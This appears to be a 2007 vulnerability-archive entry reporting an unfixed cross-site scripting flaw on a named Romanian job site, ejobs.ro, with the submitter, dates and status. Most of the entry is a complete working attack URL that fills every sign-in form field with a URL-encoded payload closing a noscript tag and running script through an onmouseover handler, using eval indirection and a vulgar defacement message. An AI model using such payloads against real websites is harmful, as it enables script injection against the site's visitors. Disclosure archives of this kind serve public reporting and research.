Security researcher MIster C., has submitted on 06/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.ejobs.ro, which at the time of submission ranked 3188 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 09/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 06/09/2007 |
Date published: 09/09/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: MIster C. |
Domain: www.ejobs.ro |
Category: XSS |
Pagerank: 3188 |
|---|
URL: http://www.ejobs.ro/company/signin.php?valid=true&fcusername=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+
onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC
.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&cpassword=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseo
ver%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE
+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&recpassword=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3D
a%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE
+OVER+THIS+AREA%3C%2Fcode%3E&nume=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%
3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AR
EA%3C%2Fcode%3E&adresa=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba
%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcod
e%3E&oras=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffuc
ked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&tara=%22
%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source
%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&telefon=%22%3E%3C%2Fn
oscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%
3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&cod_fiscal=%22%3E%3C%2Fnoscript
%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucke
d%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&atribut_fiscal=-&fax=&url=%22%3E%3C%2F
noscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B
%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&email=%22%3E%3C%2Fnoscript%3E%
3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2B
By%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&domeniu_act%5B%5D=24&oras_activ%5B%5D=263&
nivel_bussines=Local&numar_angajati=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3B
b%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+
AREA%3C%2Fcode%3E&estimare_angajari=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3B
b%3Dalert%3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+
AREA%3C%2Fcode%3E&pc_nume=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%
3Ba%28b%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2F
code%3E&pc_functie=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b
%28%2Ffucked%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E
&pc_tel=%22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucke
d%2F.source%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&pc_email=%
22%3E%3C%2Fnoscript%3E%3Cbr%3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2Ffucked%2F.sour
ce%29%29%3B%3EFucked%2BBy%2BMIster%2BC.%2BMOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&newsletter_general=
on&newsletter_articole=on&agree=on |
|
Click here to view the mirror
|
|
|
| 
